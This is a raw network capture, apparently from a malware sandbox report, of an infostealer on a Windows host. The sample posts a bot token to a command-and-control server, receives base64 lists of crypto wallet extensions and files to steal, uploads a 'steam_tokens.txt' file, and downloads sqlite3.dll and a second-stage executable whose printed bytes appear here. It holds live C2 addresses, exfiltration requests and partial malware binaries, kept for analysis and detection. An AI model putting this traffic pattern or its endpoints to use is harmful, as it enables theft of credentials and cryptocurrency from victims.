                                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a
                                                  Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"fplugins------JJJKFBAAAFHJEBFIEGID--
                                                  Nov 28, 2024 13:10:51.045748949 CET335INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:50 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Vary: Accept-Encoding
                                                  Content-Length: 108
                                                  Keep-Alive: timeout=5, max=99
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                  Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                  Nov 28, 2024 13:10:51.063389063 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
                                                  Host: 185.215.113.206
                                                  Content-Length: 6819
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Nov 28, 2024 13:10:51.063460112 CET6819OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38
                                                  Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                  Nov 28, 2024 13:10:52.143241882 CET202INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:51 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=98
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Nov 28, 2024 13:10:52.405848026 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                  Host: 185.215.113.206
                                                  Cache-Control: no-cache
                                                  Nov 28, 2024 13:10:52.996534109 CET1236INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:52 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                  ETag: "10e436-5e7ec6832a180"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 1106998
                                                  Content-Type: application/x-msdos-program
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                  Nov 28, 2024 13:10:53.092295885 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                  Data Ascii: #N@B/81s:<R@B/92P @B
                                                  Nov 28, 2024 13:10:53.092406034 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                  Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                  Nov 28, 2024 13:10:53.092420101 CET1236INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                  Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
                                                  Nov 28, 2024 13:10:53.092443943 CET1236INData Raw: b8 03 00 00 00 0f 45 c2 83 c4 34 5b 5e 5f 5d c3 55 31 c9 89 e5 57 56 53 83 ec 0c 89 45 e8 89 55 ec 31 c0 31 d2 8b 5d e8 8a 1c 0b 0f b6 fb f6 87 e0 a1 ec 61 04 74 3a be 0a 00 00 00 6b fa 0a f7 e6 01 fa 83 c0 d0 83 d2 ff 89 c6 0f be c3 89 d7 99 01
                                                  Data Ascii: E4[^_]U1WVSEU11]at:krwvE1AutM[^_]UWVSxZlHxBLpuB
                                                  Nov 28, 2024 13:10:54.916661978 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF
                                                  Host: 185.215.113.206
                                                  Content-Length: 267
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a
                                                  Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="message"wallets------CAEHJEBKFCAKKFIEHDBF--
                                                  Nov 28, 2024 13:10:55.369740009 CET1236INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:55 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Vary: Accept-Encoding
                                                  Content-Length: 2408
                                                  Keep-Alive: timeout=5, max=96
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                  Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                  Nov 28, 2024 13:10:55.373115063 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
                                                  Host: 185.215.113.206
                                                  Content-Length: 265
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 41 45 43 47 44 41 46 42 41 41 41 41 41 45 43 47 49 2d 2d 0d 0a
                                                  Data Ascii: ------GIDAECGDAFBAAAAAECGIContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------GIDAECGDAFBAAAAAECGIContent-Disposition: form-data; name="message"files------GIDAECGDAFBAAAAAECGI--
                                                  Nov 28, 2024 13:10:55.829246044 CET202INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:55 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=95
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Nov 28, 2024 13:10:55.841449022 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID
                                                  Host: 185.215.113.206
                                                  Content-Length: 363
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                  Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="file"------IIJKJDAFHJDHIEBGCFID--
                                                  Nov 28, 2024 13:10:56.788378954 CET202INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:56 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=94
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Nov 28, 2024 13:10:57.196614027 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAE
                                                  Host: 185.215.113.206
                                                  Content-Length: 272
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a
                                                  Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"bbccb813c6e378b5231ec58ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"ybncbhylepme------HIIIJDAAAAAAKECBFBAE--
                                                  Nov 28, 2024 13:10:57.647666931 CET271INHTTP/1.1 200 OK
                                                  Date: Thu, 28 Nov 2024 12:10:57 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 68
                                                  Keep-Alive: timeout=5, max=93
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                  Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.849710185.215.113.16807732C:\Users\user\Desktop\file.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 28, 2024 13:10:57.777082920 CET80OUTGET /mine/random.exe HTTP/1.1
                                                  Host: 185.215.113.16
                                                  Cache-Control: no-cache
                                                  Nov 28, 2024 13:10:59.821969032 CET1236INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Thu, 28 Nov 2024 12:10:59 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 1906176
                                                  Last-Modified: Thu, 28 Nov 2024 11:49:11 GMT
                                                  Connection: keep-alive
                                                  ETag: "674858b7-1d1600"
                                                  Accept-Ranges: bytes
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfK@K@WkDxK(K @.rsrcD@.idata @ *@cldzocnb1@rviyezxxK@.taggant0K"@
                                                  Nov 28, 2024 13:10:59.822035074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:10:59.822046995 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:10:59.822160959 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 28, 2024 13:10:59.822171926 CET896INData Raw: 4c b9 08 e4 fd 0b 38 1e 1d 56 1b e8 b9 52 99 82 ea 2a 80 29 72 fc 47 7a 8b dc a3 c4 8c 78 97 99 28 b4 2b 73 2d 74 13 a4 81 6f fb ab 0d 5d 0a 80 5d 6c 57 64 51 4e c6 fe 2b 6d 87 15 82 8b 98 7e 0d f8 ec ba a5 2f bc 79 fb ab 96 ab cd 6d cf b7 fa cf
                                                  Data Ascii: L8VR*)rGzx(+s-to]]lWdQN+m~/ymeKl6<g L\Y7(Re(SNcsi%Z%H'zR@PFd'-Z]$9m\+6]dX%
                                                  Nov 28, 2024 13:10:59.822196007 CET1236INData Raw: 28 a2 e2 09 db 5c 93 b5 f9 4f 98 99 c0 6a 2a d6 5a dc fc a6 fd c8 a4 a1 ec b8 28 ca 68 5e b9 59 ea b0 a3 d8 cc 9a 89 d9 c1 5d ea 04 71 ac d8 c9 fa 2f 88 79 65 ab f1 41 e5 08 bc bf 0c f8 ba 19 82 4b 17 04 09 4a a8 c4 6c 78 97 b9 ce b4 8b 93 ba 9c
                                                  Data Ascii: (\Oj*Z(h^Y]q/yeAKJlx@Lm/`-$+$Uj5Y(-j=Y]fl+HQEGM+rtcmKH`ltkA~YX]\Bq\Yd*U
                                                  Nov 28, 2024 13:10:59.822210073 CET1236INData Raw: 13 42 c3 18 58 34 87 aa da 74 dd 60 e9 74 3d a4 2e 7a 37 fd f2 e6 89 b1 32 83 f6 07 c5 1d 20 37 e4 0f 35 ca 86 1b bb 3d 47 68 51 e6 f9 56 27 9b 85 54 8f 13 b3 3c 27 c2 7a fb f5 25 ed e3 40 28 67 ad 8e 93 5a 34 ed 11 80 36 01 ec 3a ad 7e 9b 90 34
                                                  Data Ascii: BX4t`t=.z72 75=GhQV'T<'z%@(gZ46:~4TLF{!slN%'>GvSmbN^1}Cz9=hDhl:=8kd3~B_le]?%Mj\*Z =d!$]gmjd?2ShS\Kd45[$uX
                                                  Nov 28, 2024 13:10:59.822227955 CET1236INData Raw: 09 81 49 13 86 fb 70 75 e1 a4 ce 80 f9 17 d3 e8 56 1c 60 bc 77 5a 93 20 93 44 e5 aa 91 fc ec 98 8e 4b 49 65 9a 45 af 22 e3 c3 48 22 1a dd 2f fb c1 5c 50 1a f9 99 c3 68 d8 28 c2 e5 85 fb f0 53 de f5 8a 9a 9d 74 0d 63 e2 de 1d 52 ed d8 bb 31 65 78
                                                  Data Ascii: IpuV`wZ DKIeE"H"/\Ph(StcR1ex Rc}OW>[w6z1Jt{)X,<rZyM>RSBbV9dp_&uGu0&{LLAXXv\4Fe|s
                                                  Nov 28, 2024 13:10:59.822381973 CET1236INData Raw: ed b7 58 7e e5 f0 d1 98 55 7e 70 9e 33 16 0c 35 4f 33 71 c9 d5 6f 02 c1 09 20 77 9f 23 95 f5 6e ab ee 38 9f 45 da 8e ad 6d d1 ba 41 a1 90 fc c8 70 a8 7c 34 a9 da 7f 01 60 5a 15 3c f9 f9 53 9b fb 88 c0 aa aa ef 7b 81 20 da 87 43 aa 54 86 65 83 3b
                                                  Data Ascii: X~U~p35O3qo w#n8EmAp|4`Z<S{ CTe;#4Ab?ZbWl+,K4:ZK`bJbh4iRsy\Sc`h:#Yep1iYex)!i#my\v@aQz8<\2
                                                  Nov 28, 2024 13:10:59.822395086 CET1236INData Raw: a6 a4 f2 81 fd 58 b9 6b 3b b1 aa 64 ac 7f 34 67 9d 93 ba 61 81 b9 f9 33 e5 13 ef da 59 0e 84 ec e3 05 7d f3 ea f3 42 31 13 d2 6c ab 40 2d b6 62 47 ec 53 a8 e2 13 a6 eb 6e 1f f5 f7 40 08 10 3d bf 5f 8e 8f 07 8c 3c 4e 90 94 26 43 11 c9 09 e3 11 5c
